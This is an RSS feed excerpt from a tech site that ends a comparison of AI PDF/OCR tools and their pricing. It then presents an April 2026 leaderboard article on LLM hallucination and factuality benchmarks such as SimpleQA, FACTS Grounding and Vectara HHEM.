<p>Pricing is $2 per 1,000 pages with the standard API (<code>mistral-ocr-latest</code>), dropping to $1 per 1,000 pages with the Batch API - the lowest among the major cloud providers. The API processes up to 2,000 pages per minute per node. A limited self-hosting option exists for customers with classified or highly sensitive workloads, but it's not generally available.</p>
<p>The output format deserves mention: Mistral OCR returns interleaved text and image references in Markdown, with tables as HTML, and supports structured JSON output for downstream use. This makes it directly usable in <a href="/guides/what-is-rag/">RAG pipelines</a> without a separate parsing layer.</p>
<h3 id="llamaparse--llamaindex">LlamaParse / LlamaIndex</h3>
<p>LlamaParse runs on a credit system: 1,000 credits = $1.25. The cost per page ranges from $0.00125 (one credit, simple text extraction) to roughly $0.11 per page (90 credits, using a top-tier LLM agent like Sonnet for parsing). For most RAG workflows, the &quot;cost-effective&quot; mode at 3 credits per page ($0.00375 per page) is the practical baseline.</p>
<p>The 10,000 free credits on signup translates to roughly 3,300 pages at cost-effective mode - enough for a real pilot. LlamaParse is the natural fit if you're already using LlamaIndex for vector indexing and retrieval; the ecosystem integration reduces boilerplate. In March 2026, LlamaIndex also open-sourced LiteParse, a TypeScript-native local parser for agents that need zero-latency PDF parsing without cloud calls.</p>
<p>For complex layouts (financial tables, academic papers with equations), LlamaParse's premium agent mode is competitive, but Mistral OCR's batch pricing will be cheaper at scale.</p>
<h3 id="reducto">Reducto</h3>
<p>Reducto is built for production pipelines where table and form accuracy is critical. It combines traditional computer vision with vision-language models. On Reducto's own RD-TableBench, it scores an average table similarity of 90.2%. The benchmark is open-source (1,000 hand-labeled examples covering scanned tables, handwriting, merged cells, and multilingual content) and worth running against your own documents if you're evaluating vendors.</p>
<p>Pricing starts free for the first 15,000 credits, then moves to custom growth pricing. There's no public per-page rate - Reducto targets enterprises and pricing requires a conversation. HIPAA and SOC2 compliance, EU/AU data residency, and VPC deployment are available on paid tiers.</p>
<h3 id="unstructuredio">Unstructured.io</h3>
<p>Unstructured offers both an open-source library and a managed platform. The open-source library is free to self-host and supports 60+ file types. The managed API charges $0.03 per page pay-as-you-go after 15,000 free pages - meaningfully cheaper than Azure or AWS for high-volume basic extraction. Compliance certifications (HIPAA, SOC2, GDPR, ISO 27001) make it viable for regulated industries.</p>
<p>The parsing strategy selection - Fast, Hi-Res, VLM, Auto - lets engineers trade speed against accuracy. Hi-Res and VLM modes handle complex layouts but at higher latency and cost. The open-source path is the cheapest option if you have the infrastructure to run it.</p>
<p><img src="/images/tools/best-ai-pdf-tools-2026-unstructured-ui.jpg" alt="Unstructured.io platform UI showing document processing workflow and pipeline configuration">
<em>The Unstructured platform's no-code workflow builder. Engineers can also access the same processing via API without the UI layer.</em>
<small>Source: unstructured.io</small></p>
<h3 id="azure-ai-document-intelligence-aws-textract-google-document-ai">Azure AI Document Intelligence, AWS Textract, Google Document AI</h3>
<p>These are the incumbent cloud offerings. They're battle-tested at enterprise scale but expensive compared to newer entrants.</p>
<p><strong>Azure AI Document Intelligence</strong>: The Read model costs $1.50 per 1,000 pages, matching Google's OCR rate. Prebuilt models (invoices, receipts, contracts) run $10 per 1,000 pages. Custom extractors cost $30 per 1,000 pages for the first million pages, dropping to $20 afterward. Azure's advantage is deep integration with the Microsoft ecosystem and strong form-field extraction on standard document types.</p>
<p><strong>AWS Textract</strong>: Basic text detection runs $1.50 per 1,000 pages. Table and form extraction (Analyze Document) ranges from $15 to $65 per 1,000 pages depending on features enabled. Volume discounts kick in above one million pages, dropping basic detection to $0.60 per 1,000 pages. Textract's table accuracy on Reducto's RD-TableBench was notably below Reducto and Mistral OCR in the benchmark results.</p>
<p><strong>Google Document AI</strong>: OCR costs $1.50 per 1,000 pages (dropping to $0.60 above five million pages). Specialized processors - invoice parser, expense parser - each cost $0.10 per 10 pages ($10 per 1,000 pages). The Custom Extractor is $30 per 1,000 pages, same as Azure. Google's strength is language coverage and integration with Google Cloud workflows.</p>
<p>For teams already deep in AWS, Azure, or GCP, the convenience of staying in one cloud often justifies the price premium. For greenfield projects, Mistral OCR's accuracy and pricing make it hard to justify the incumbents on cost alone.</p>
<h3 id="marker-and-docling-open-source">Marker and Docling (Open Source)</h3>
<p>These are the two strongest open-source options for teams that want full control, zero per-page costs, and on-premises deployment.</p>
<p><strong>Docling</strong> (IBM Research, Apache 2.0) outputs a structured <code>DoclingDocument</code> format that preserves semantic hierarchy - not just text, but the relationships between elements. It scored 0.882 on OmniDocBench text fidelity in evaluations. Docling reached 37,000 GitHub stars and is optimized for production RAG pipelines. It handles PDFs, DOCX, PPTX, HTML, and images.</p>
<p><strong>Marker</strong> (MIT license, available at <a href="https://github.com/datalab-to/marker">github.com/datalab-to/marker</a>) scored 0.861 on OmniDocBench and supports an optional <code>--use_llm</code> flag that layers a LLM on top for accuracy-critical documents. Without the flag, it runs fast on CPU. With it, accuracy approaches commercial APIs. Marker is slower than Docling at scale (one benchmark put it at 53 seconds per page on complex academic documents vs Docling's single-pass approach), but the LLM enhancement mode is useful for isolated high-value documents.</p>
<p>Both tools are available via PyPI. Neither offers cloud hosting or SLAs - you're running the infrastructure.</p>
<hr>
<h2 id="which-should-you-use">Which Should You Use?</h2>
<p><strong>For one-off summaries and Q&amp;A:</strong> ChatDOC free tier covers most needs. Use Adobe Acrobat AI if you already have an Acrobat subscription.</p>
<p><strong>For student and research use:</strong> HumataAI's $1.99/month student plan or ChatDOC free tier. AskYourPDF for heavy multi-document work.</p>
<p><strong>For production extraction pipelines:</strong> Start with Mistral OCR. It's the cheapest major cloud API with benchmark-backed accuracy. If you need deep LlamaIndex integration, add LlamaParse for complex layouts. For tables at enterprise scale with custom SLAs, Reducto.</p>
<p><strong>For regulated or air-gapped environments:</strong> Unstructured.io open-source or Docling for self-hosted extraction. Azure Document Intelligence if regulatory requirements demand a commercial vendor with established compliance certifications.</p>
<p><strong>For cost-sensitive high-volume OCR:</strong> Google Document AI's OCR tier ($1.50/1K pages) or Mistral's batch API ($1/1K pages). AWS Textract's advanced features are the most expensive in this group.</p>
<hr>
<h2 id="faq">FAQ</h2>
<h3 id="which-ai-pdf-tool-is-most-accurate-on-tables">Which AI PDF tool is most accurate on tables?</h3>
<p>Mistral OCR leads at 96.1% in internal benchmarks. On Reducto's public RD-TableBench, Reducto scores 90.2%. Neither AWS Textract nor GPT-4o alone matches Reducto's table accuracy in that benchmark, and GPT-4o has documented hallucination issues on dense tables.</p>
<h3 id="can-i-use-these-tools-with-sensitive-documents">Can I use these tools with sensitive documents?</h3>
<p>Unstructured.io, Docling, and Marker can run fully self-hosted. Reducto offers HIPAA/SOC2 compliance and VPC deployment on enterprise plans. Mistral OCR has a selective self-hosting option for classified workflows. Consumer tools like ChatPDF and HumataAI are cloud-only.</p>
<h3 id="whats-the-cheapest-way-to-extract-text-from-pdfs-at-scale">What's the cheapest way to extract text from PDFs at scale?</h3>
<p>Mistral OCR's Batch API at $1 per 1,000 pages is the lowest public rate among cloud APIs. Self-hosted Docling or Marker are free, but you're paying for compute.</p>
<h3 id="does-llamaparse-support-non-pdf-formats">Does LlamaParse support non-PDF formats?</h3>
<p>Yes. LlamaParse supports PDF, PPTX, DOCX, XLSX, HTML, JPEG, and more. Pricing and accuracy vary by file type.</p>
<h3 id="what-output-formats-do-developer-apis-produce">What output formats do developer APIs produce?</h3>
<p>Mistral OCR outputs Markdown with HTML tables and supports structured JSON. LlamaParse produces Markdown and JSON. Unstructured outputs JSON, HTML, and Markdown. Docling produces its own DoclingDocument format plus Markdown and JSON export. Azure, AWS, and Google all return JSON.</p>
<hr>
<h2 id="sources">Sources</h2>
<ul>
<li><a href="https://mistral.ai/news/mistral-ocr">Mistral OCR announcement and benchmarks</a></li>
<li><a href="https://mistral.ai/news/mistral-ocr-3">Mistral OCR 3 release (January 2026)</a></li>
<li><a href="https://reducto.ai/blog/rd-tablebench">Reducto RD-TableBench benchmark</a></li>
<li><a href="https://reducto.ai/pricing">Reducto pricing</a></li>
<li><a href="https://unstructured.io/pricing">Unstructured.io pricing</a></li>
<li><a href="https://www.llamaindex.ai/pricing">LlamaIndex / LlamaParse pricing</a></li>
<li><a href="https://cloud.google.com/document-ai/pricing">Google Document AI pricing</a></li>
<li><a href="https://aws.amazon.com/textract/pricing/">AWS Textract pricing</a></li>
<li><a href="https://azure.microsoft.com/en-us/pricing/details/document-intelligence/">Azure AI Document Intelligence pricing</a></li>
<li><a href="https://www.humata.ai/pricing">HumataAI pricing</a></li>
<li><a href="https://chatdoc.com/blog/chatdoc-pro-plan/">ChatDOC Pro plan</a></li>
<li><a href="https://www.chatpdf.com/">ChatPDF</a></li>
<li><a href="https://arxiv.org/abs/2412.07626">OmniDocBench paper (CVPR 2025)</a></li>
<li><a href="https://github.com/datalab-to/marker">Marker on GitHub</a></li>
<li><a href="https://github.com/docling-project/docling">Docling on GitHub</a></li>
</ul>
]]></content:encoded><dc:creator>James Kowalski</dc:creator><category>Tools</category><media:content url="https://awesomeagents.ai/images/tools/best-ai-pdf-tools-2026_hu_cb013f12d95f4051.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/tools/best-ai-pdf-tools-2026_hu_cb013f12d95f4051.jpg" width="1200" height="675"/></item><item><title>Hallucination Benchmarks Leaderboard: April 2026</title><link>https://awesomeagents.ai/leaderboards/hallucination-benchmarks-leaderboard/</link><pubDate>Fri, 17 Apr 2026 20:11:08 +0200</pubDate><guid>https://awesomeagents.ai/leaderboards/hallucination-benchmarks-leaderboard/</guid><description>&lt;p>Every frontier model provider claims their system is more accurate and less hallucinatory than the competition. This leaderboard cuts through those claims by looking at what the benchmarks actually show - and the picture is messier than the marketing suggests.&lt;/p></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<p>Every frontier model provider claims their system is more accurate and less hallucinatory than the competition. This leaderboard cuts through those claims by looking at what the benchmarks actually show - and the picture is messier than the marketing suggests.</p>
<p>No single benchmark captures the full scope of how models fail on facts. TruthfulQA tests whether models parrot common misconceptions. SimpleQA probes short-form factual recall. FACTS Grounding measures faithfulness to provided source documents. The Vectara leaderboard tracks summarization-time hallucinations. AA-Omniscience penalizes wrong answers and rewards abstention. Together they give a more honest picture of where models stand.</p>
<div class="news-tldr">
<p><strong>TL;DR</strong></p>
<ul>
<li>Gemini 2.5 Pro leads SimpleQA at 53.0%; no model cracks 70% on FACTS Grounding</li>
<li>Reasoning models score worse on grounded summarization - the &quot;think more&quot; approach sometimes makes faithfulness worse</li>
<li>Phi-3.5-MoE-instruct tops TruthfulQA at 0.775, outscoring much larger closed models on that older benchmark</li>
</ul>
</div>
<h2 id="why-factuality-benchmarks-diverge">Why Factuality Benchmarks Diverge</h2>
<p>Before diving into the numbers, it helps to understand what each benchmark actually tests. They don't measure the same thing, and strong performance on one doesn't predict performance on another.</p>
<p>If you want the conceptual background, our <a href="/guides/ai-hallucinations-explained/">guide to AI hallucinations</a> explains the core failure modes, and our <a href="/guides/understanding-ai-benchmarks/">understanding AI benchmarks guide</a> covers what benchmark scores can and can't tell you.</p>
<table>
  <thead>
      <tr>
          <th>Benchmark</th>
          <th>What it measures</th>
          <th>Format</th>
          <th>Dataset size</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>TruthfulQA</td>
          <td>Resistance to common misconceptions</td>
          <td>Multiple-choice (MC1/MC2)</td>
          <td>817 questions</td>
      </tr>
      <tr>
          <td>SimpleQA</td>
          <td>Short-form factual recall</td>
          <td>Open-ended Q&amp;A</td>
          <td>4,326 questions</td>
      </tr>
      <tr>
          <td>FACTS Grounding</td>
          <td>Faithfulness to source documents (up to 32K tokens)</td>
          <td>Long-form generation</td>
          <td>1,719 examples</td>
      </tr>
      <tr>
          <td>Vectara HHEM</td>
          <td>Hallucination rate in document summarization</td>
          <td>Summarization</td>
          <td>7,700+ articles</td>
      </tr>
      <tr>
          <td>HaluEval</td>
          <td>Hallucination detection across QA, dialogue, summarization</td>
          <td>Classification</td>
          <td>35,000 examples</td>
      </tr>
      <tr>
          <td>HalluLens</td>
          <td>Extrinsic and intrinsic hallucination taxonomy</td>
          <td>Multi-task</td>
          <td>Dynamic generation</td>
      </tr>
      <tr>
          <td>AA-Omniscience</td>
          <td>Factual recall across 42 topics, rewards abstention</td>
          <td>Open-ended Q&amp;A</td>
          <td>6,000 questions</td>
      </tr>
  </tbody>
</table>
<p>One important distinction runs through all of these: hallucination and factuality aren't the same thing. HalluLens (from Meta FAIR, published at ACL 2025) formalizes this: an extrinsic hallucination contradicts a model's own training data, while an intrinsic hallucination contradicts the context provided in the prompt. Benchmarks conflate these two failure modes frequently, which is why a model can look excellent on one test and poor on another.</p>
<h2 id="truthfulqa">TruthfulQA</h2>
<p>TruthfulQA, introduced by Lin et al. in 2021, targets imitative falsehoods - wrong answers that feel plausible because they appear in human-written text. The 817 questions span 38 categories including health, law, finance, and politics.</p>
<p>The benchmark has a well-documented weakness: it's easy to game by training on similar questions, and contamination from public benchmarks is a real concern. Still, it remains widely reported and its MC2 scoring (normalized probability assigned to the set of true answers) is more robust than MC1.</p>
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Model</th>
          <th>Provider</th>
          <th>TruthfulQA Score</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>Phi-3.5-MoE-instruct</td>
          <td>Microsoft</td>
          <td>0.775</td>
      </tr>
      <tr>
          <td>2</td>
          <td>Granite 3.3 8B Instruct</td>
          <td>IBM</td>
          <td>0.669</td>
      </tr>
      <tr>
          <td>3</td>
          <td>Phi 4 Mini</td>
          <td>Microsoft</td>
          <td>0.664</td>
      </tr>
      <tr>
          <td>4</td>
          <td>Phi-3.5-mini-instruct</td>
          <td>Microsoft</td>
          <td>0.640</td>
      </tr>
      <tr>
          <td>5</td>
          <td>Hermes 3 70B</td>
          <td>Nous Research</td>
          <td>0.633</td>
      </tr>
      <tr>
          <td>6</td>
          <td>Llama 3.1 Nemotron 70B Instruct</td>
          <td>NVIDIA</td>
          <td>0.586</td>
      </tr>
      <tr>
          <td>7</td>
          <td>Qwen2.5 14B Instruct</td>
          <td>Alibaba Cloud</td>
          <td>0.584</td>
      </tr>
      <tr>
          <td>8</td>
          <td>Jamba 1.5 Large</td>
          <td>AI21 Labs</td>
          <td>0.583</td>
      </tr>
      <tr>
          <td>9</td>
          <td>Qwen2.5 32B Instruct</td>
          <td>Alibaba Cloud</td>
          <td>0.578</td>
      </tr>
      <tr>
          <td>10</td>
          <td>Command R+</td>
          <td>Cohere</td>
          <td>0.563</td>
      </tr>
  </tbody>
</table>
<p><em>Source: llm-stats.com, 17 self-reported results, no verified external evaluation.</em></p>
<p>The most striking pattern: Microsoft's Phi family controls the top three slots. Phi-3.5-MoE-instruct's 0.775 score stands well above the field. Notably absent from the top 10 are GPT-4o, Claude Opus, and Gemini - the headline frontier models. That's partly because TruthfulQA has become saturated for the largest models (who were likely trained with TruthfulQA-style data in mind), and partly because the leaderboard only has 17 submissions - closed model providers don't always report this score publicly.</p>
<p>The original paper documented an inverse scaling effect: larger models answered <em>less</em> truthfully on this benchmark, not more. That relationship has weakened with instruction tuning and RLHF, but it is a reminder that scale alone doesn't fix factuality.</p>
<p><img src="/images/leaderboards/hallucination-benchmarks-leaderboard-benchmark-chart.jpg" alt="Stock market analysis documents with magnifying glass - representing close examination of AI model claims">
<em>Factuality benchmarks require examining model outputs against verifiable sources, much like document analysis.</em>
<small>Source: pexels.com</small></p>
<h2 id="simpleqa">SimpleQA</h2>
<p>SimpleQA, released by OpenAI in October 2024, focuses on short-form factual questions with verifiable single answers. The 4,326 questions were verified by multiple human raters and are designed to have clear, objective correct answers - not ambiguous or opinion-based queries.</p>
<p>This is arguably the most important factuality benchmark right now, because it's recent, resistant to training contamination (questions weren't publicly available before the benchmark launched), and covers a wide factual domain.</p>
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Model</th>
          <th>Provider</th>
          <th>SimpleQA Score</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>Gemini 2.5 Pro</td>
          <td>Google</td>
          <td>53.0%</td>
      </tr>
      <tr>
          <td>2</td>
          <td>Qwen3 235B A22B Instruct 2507</td>
          <td>Alibaba</td>
          <td>50.6%</td>
      </tr>
      <tr>
          <td>3</td>
          <td>Qwen3 VL 235B A22B Instruct</td>
          <td>Alibaba</td>
          <td>46.7%</td>
      </tr>
      <tr>
          <td>4</td>
          <td>GPT-4.1</td>
          <td>OpenAI</td>
          <td>40.4%</td>
      </tr>
      <tr>
          <td>5</td>
          <td>Qwen3 Next 80B A3B Instruct</td>
          <td>Alibaba</td>
          <td>40.1%</td>
      </tr>
      <tr>
          <td>6</td>
          <td>Grok 3 Beta</td>
          <td>xAI</td>
          <td>38.3%</td>
      </tr>
      <tr>
          <td>7</td>
          <td>Qwen3 VL 235B A22B Thinking</td>
          <td>Alibaba</td>
          <td>37.9%</td>
      </tr>
      <tr>
          <td>8</td>
          <td>Grok 3</td>
          <td>xAI</td>
          <td>37.4%</td>
      </tr>
      <tr>
          <td>9</td>
          <td>ERNIE 4.5 300B A47B</td>
          <td>Baidu</td>
          <td>36.9%</td>
      </tr>
      <tr>
          <td>10</td>
          <td>Claude 3.7 Sonnet Thinking</td>
          <td>Anthropic</td>
          <td>32.8%</td>
      </tr>
      <tr>
          <td>11</td>
          <td>Claude 3.7 Sonnet</td>
          <td>Anthropic</td>
          <td>32.8%</td>
      </tr>
      <tr>
          <td>12</td>
          <td>DeepSeek R1</td>
          <td>DeepSeek</td>
          <td>29.1%</td>
      </tr>
  </tbody>
</table>
<p><em>Source: pricepertoken.com SimpleQA leaderboard, updated April 17, 2026. 45 models evaluated, average score 20.8.</em></p>
<p>A few things stand out. First, Gemini 2.5 Pro's lead is real but not commanding - the gap between first and fourth (GPT-4.1) is about 12 percentage points. Second, the Qwen3 family punches above its weight, with three models in the top five. Third, the absolute scores are low across the board. The leader gets 53% right. The field average is 20.8%. These aren't figures a vendor would put on a press release, which is probably why SimpleQA scores often get buried when companies announce new models.</p>
<p>The Thinking variants don't consistently outperform their non-thinking counterparts on this benchmark - Claude 3.7 Sonnet Thinking ties with Claude 3.7 Sonnet at 32.8%.</p>
<h2 id="facts-grounding">FACTS Grounding</h2>
<p>FACTS Grounding, from Google DeepMind, tests something different: given a long document (up to 32,000 tokens) and a user request, does the model answer faithfully based on what's in the document without hallucinating content not present in the source?</p>
<p>The benchmark uses 1,719 examples across finance, technology, medicine, law, and retail. Three LLM judges - Gemini 1.5 Pro, GPT-4o, and Claude 3.5 Sonnet - each score responses, and the final score averages their judgments to reduce individual model bias. Responses that fail to address the user request are disqualified before scoring.</p>
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Model</th>
          <th>Provider</th>
          <th>FACTS Grounding Score</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>Gemini 2.0 Flash Experimental</td>
          <td>Google</td>
          <td>83.6%</td>
      </tr>
      <tr>
          <td>2</td>
          <td>Gemini 1.5 Flash</td>
          <td>Google</td>
          <td>82.9%</td>
      </tr>
      <tr>
          <td>3</td>
          <td>Gemini 1.5 Pro</td>
          <td>Google</td>
          <td>80.0%</td>
      </tr>
      <tr>
          <td>4</td>
          <td>Claude 3.5 Sonnet</td>
          <td>Anthropic</td>
          <td>79.4%</td>
      </tr>
      <tr>
          <td>5</td>
          <td>GPT-4o</td>
          <td>OpenAI</td>
          <td>78.8%</td>
      </tr>
  </tbody>
</table>
<p><em>Source: FACTS Grounding paper (arxiv 2501.03200), original leaderboard results from January 2025.</em></p>
<p>Google's models dominate the top three, which isn't surprising given they designed the benchmark - though the research team took care to use a multi-judge setup and include non-Google judges. Claude 3.5 Sonnet and GPT-4o are close behind, both above 78%.</p>
<p>The FACTS Benchmark Suite (announced in early 2026) expands this to four dimensions: Grounding v2, Parametric, Search, and Multimodal. Under that harder suite, Gemini 3 Pro leads with an overall FACTS Score of 68.8%, and no model breaks 70%. The added difficulty comes from longer documents and more complex reasoning requirements. The full suite is described on the <a href="https://deepmind.google/blog/facts-benchmark-suite-systematically-evaluating-the-factuality-of-large-language-models/">Google DeepMind FACTS Benchmark Suite blog post</a>.</p>
<p>A caveat worth noting: the research team found models rate their own outputs 3.23 percentage points higher than those from competing providers on average, which is why the multi-judge approach matters. Single-judge evaluations of grounding are suspect.</p>
<h2 id="vectara-hhem-leaderboard">Vectara HHEM Leaderboard</h2>
<p>Vectara's hallucination leaderboard, now in its second generation, measures how often models introduce unsupported information when summarizing documents. The evaluation uses Vectara's HHEM-2.3 model (with a FaithJudge approach for some comparisons) to score factual consistency.</p>
<p>The refreshed dataset expanded from 1,000 to 7,700+ articles spanning law, medicine, finance, technology, education, sports, and news. Articles now reach 32K tokens, which is a meaningful difficulty increase. The leaderboard was last updated March 20, 2026.</p>
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Model</th>
          <th>Provider</th>
          <th>Hallucination Rate</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>finix_s1_32b</td>
          <td>Ant Group</td>
          <td>1.8%</td>
      </tr>
      <tr>
          <td>2</td>
          <td>gpt-5.4-nano</td>
          <td>OpenAI</td>
          <td>3.1%</td>
      </tr>
      <tr>
          <td>3</td>
          <td>gemini-2.5-flash-lite</td>
          <td>Google</td>
          <td>3.3%</td>
      </tr>
      <tr>
          <td>4</td>
          <td>Phi-4</td>
          <td>Microsoft</td>
          <td>3.7%</td>
      </tr>
      <tr>
          <td>5</td>
          <td>Llama-3.3-70B-Instruct-Turbo</td>
          <td>Meta</td>
          <td>4.1%</td>
      </tr>
  </tbody>
</table>
<p><em>Source: Vectara hallucination leaderboard GitHub (last updated March 20, 2026). Lower hallucination rate = better.</em></p>
<p>The top result from Ant Group's finix_s1_32b at 1.8% is impressive, though this is a less-known model with limited independent benchmarking. The more notable finding from the updated leaderboard: reasoning-focused frontier models - GPT-5, Claude Sonnet 4.5, and Grok-4 - all show hallucination rates above 10% on the harder dataset. Vectara's explanation is that these models &quot;overthink&quot; summarization, deviating from source material in ways that smaller, more focused models don't.</p>
<p>This has direct effects for RAG pipelines. Our <a href="/leaderboards/rag-benchmarks-leaderboard/">RAG Benchmarks Leaderboard</a> covers the retrieval side; on the generation side, these hallucination rates suggest that raw intelligence and grounding faithfulness don't move together.</p>
<p><img src="/images/leaderboards/hallucination-benchmarks-leaderboard-fact-checking.jpg" alt="A person reviewing document carefully using a magnifying glass - representing detailed fact-checking of AI outputs">
<em>Careful verification of AI outputs remains necessary given hallucination rates that persist even in frontier models.</em>
<small>Source: pexels.com</small></p>
<h2 id="hallulens-and-halueval">HalluLens and HaluEval</h2>
<p>HaluEval (RUCAIBox, EMNLP 2023) is a research benchmark with 35,000 examples across question answering, knowledge-grounded dialogue, and text summarization. It found that ChatGPT produced hallucinated content in roughly 19.5% of user queries when prompted in specific topic domains. It doesn't maintain a live leaderboard, but it's widely used in academic hallucination research as a standard evaluation set.</p>
<p>HalluLens (Meta FAIR, ACL 2025) goes further by distinguishing extrinsic from intrinsic hallucinations. The key result: Llama-3.1-405B-Instruct showed the lowest false acceptance rate (6.88%) on non-existent entity prompts, while some Mistral variants hit rates above 80%. GPT-4o balanced precision and recall best across tasks, scoring 52.59% accuracy on PreciseWikiQA.</p>
<p>The benchmark creates test sets dynamically to prevent data leakage - a design choice that matters for assessing newer models that may have trained on older static benchmarks.</p>
<h2 id="aa-omniscience">AA-Omniscience</h2>
<p>Artificial Analysis released AA-Omniscience in early 2026 as a knowledge and hallucination benchmark that jointly rewards correct answers and penalizes hallucinations. The scoring metric, the AA-Omniscience Index, runs from -100 to 100: a score of 0 means the model is equally likely to be right as wrong.</p>
<p>The 6,000 questions span 42 economically relevant topics across six domains. A key design choice: abstaining when uncertain is rewarded, unlike benchmarks that count refusals as failures.</p>
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Model</th>
          <th>Provider</th>
          <th>AA-Omniscience Index</th>
          <th>Hallucination Rate</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>Gemini 3.1 Pro Preview</td>
          <td>Google</td>
          <td>33</td>
          <td>~50%</td>
      </tr>
      <tr>
          <td>2</td>
          <td>Claude Opus 4.7 (Adaptive Reasoning)</td>
          <td>Anthropic</td>
          <td>26</td>
          <td>-</td>
      </tr>
      <tr>
          <td>3</td>
          <td>Gemini 3 Pro Preview</td>
          <td>Google</td>
          <td>16</td>
          <td>~88%</td>
      </tr>
      <tr>
          <td>-</td>
          <td>Grok 4.20 (Reasoning)</td>
          <td>xAI</td>
          <td>-</td>
          <td>17% (lowest)</td>
      </tr>
      <tr>
          <td>-</td>
          <td>Claude 4.5 Haiku</td>
          <td>Anthropic</td>
          <td>-</td>
          <td>25%</td>
      </tr>
  </tbody>
</table>
<p><em>Source: artificialanalysis.ai/evaluations/omniscience. AA-Omniscience Index measures net factual reliability; hallucination rate is incorrect answers as a fraction of all non-correct responses.</em></p>
<p>The highest AA-Omniscience Index belongs to Gemini 3.1 Pro Preview at 33. Grok 4.20 in reasoning mode achieves the lowest raw hallucination rate at 17%. Claude 4.5 Haiku comes in third on hallucination rate at 25% - an interesting result for a smaller, non-reasoning model.</p>
<p>The gap between the accuracy ranking and the index ranking shows why the metric design matters. Gemini 3 Pro has a higher raw accuracy (56%) than Gemini 3.1 Pro Preview (55%), but its hallucination rate of ~88% drags the index down severely. A model that guesses more and is wrong more often gets penalized harder under this scoring system, which better reflects real-world reliability requirements.</p>
<h2 id="key-takeaways">Key Takeaways</h2>
<h3 id="no-single-benchmark-tells-the-whole-story">No single benchmark tells the whole story</h3>
<p>A model that ranks first on TruthfulQA may not rank first on SimpleQA, and a model that grounds faithfully to documents (FACTS Grounding) may still hallucinate during open-ended generation (AA-Omniscience). The leaderboards need to be read together. Our <a href="/leaderboards/overall-llm-rankings-apr-2026/">overall LLM rankings</a> cover aggregate performance, but factuality is best assessed per-use-case.</p>
<h3 id="reasoning-models-introduce-a-grounding-tradeoff">Reasoning models introduce a grounding tradeoff</h3>
<p>The Vectara finding that GPT-5, Claude Sonnet 4.5, and Grok-4 exceed 10% hallucination rates on their harder dataset is consistent with a pattern showing up across evaluations: chain-of-thought reasoning helps with tasks that need derivation, but it can hurt faithfulness on tasks that just need the model to stick to what's in front of it. If your application is document-grounded (RAG, summarization, contract review), a smaller, more focused model may serve you better than the biggest frontier reasoning model.</p>
<h3 id="benchmark-contamination-is-a-real-concern-for-truthfulqa">Benchmark contamination is a real concern for TruthfulQA</h3>
<p>TruthfulQA's age (2021) and public availability mean that training datasets likely include examples similar to its questions. SimpleQA was designed to ease this by using a withheld question set. FACTS Grounding uses a private held-out set for the same reason. When evaluating new models, weight newer and harder benchmarks more heavily.</p>
<h3 id="open-source-models-can-match-or-exceed-closed-models-on-factuality">Open-source models can match or exceed closed models on factuality</h3>
<p>Phi-3.5-MoE-instruct leads TruthfulQA. Llama-3.1-405B-Instruct performs best on HalluLens extrinsic hallucinations. Ant Group's finix_s1_32b leads the Vectara leaderboard. The narrative that frontier closed models are always more accurate doesn't hold up across these benchmarks.</p>
<h2 id="practical-guidance">Practical Guidance</h2>
<p><strong>For document-grounded applications</strong> (summarization, contract review, RAG): Focus on FACTS Grounding and Vectara HHEM scores. Prefer models that score above 78% on FACTS Grounding. Avoid reasoning-heavy models unless you've tested their grounding behavior on your specific document types.</p>
<p><strong>For factual Q&amp;A assistants</strong> (research tools, knowledge bases): Use SimpleQA as your primary signal. Top performers are Gemini 2.5 Pro (53.0%), the Qwen3 235B family (50.6%), and GPT-4.1 (40.4%). The field average of 20.8% means you should build retrieval augmentation into any production system rather than relying on parametric knowledge alone.</p>
<p><strong>For general trust calibration</strong>: AA-Omniscience gives the most complete picture because it penalizes overconfidence. Models with a high index score are doing something real - they're either answering correctly more often, hedging appropriately, or both.</p>
<p><strong>Budget-conscious options</strong>: Phi-3.5-MoE-instruct punches above its weight class on TruthfulQA. Gemini 2.5 Flash Lite leads the Vectara leaderboard among accessible models at 3.3% hallucination rate. Smaller models with factuality-focused training can outperform larger general-purpose models on specific tasks.</p>
<hr>
<h2 id="faq">FAQ</h2>
<h3 id="which-model-has-the-lowest-hallucination-rate-in-2026">Which model has the lowest hallucination rate in 2026?</h3>
<p>On the Vectara summarization benchmark, Ant Group's finix_s1_32b leads at 1.8%. On AA-Omniscience, Grok 4.20 in reasoning mode reaches the lowest raw hallucination rate at 17%.</p>
<h3 id="what-is-simpleqa-and-why-does-it-matter">What is SimpleQA and why does it matter?</h3>
<p>SimpleQA is OpenAI's 4,326-question benchmark for short-form factual accuracy. It's considered more contamination-resistant than TruthfulQA because it used a withheld question set at launch. The field average score of 20.8% shows factual recall remains a weak point across models.</p>
<h3 id="does-truthfulqa-still-matter-in-2026">Does TruthfulQA still matter in 2026?</h3>
<p>It's useful but limited. The benchmark dates to 2021, is publicly available, and likely appears in training data. It's also small (817 questions). Use it as a sanity check, not a primary signal. SimpleQA and FACTS Grounding are more reliable for current model comparisons.</p>
<h3 id="why-do-reasoning-models-hallucinate-more-on-summarization">Why do reasoning models hallucinate more on summarization?</h3>
<p>Vectara's leaderboard data suggests reasoning models deviate from source documents because their chain-of-thought process adds inferences beyond what's written. Document summarization rewards strict faithfulness, not elaboration - a task better suited to smaller, focused models.</p>
<h3 id="what-does-the-facts-benchmark-suite-measure-beyond-the-original">What does the FACTS Benchmark Suite measure beyond the original?</h3>
<p>The full FACTS Suite adds Parametric (knowledge without retrieval), Search (using web search tools), and Multimodal (image-grounded factuality) on top of the original Grounding benchmark. No model has topped 70% average across all four components as of April 2026.</p>
<hr>
<p><strong>Sources:</strong></p>
<ul>
<li><a href="https://arxiv.org/abs/2109.07958">TruthfulQA paper (arxiv 2109.07958)</a></li>
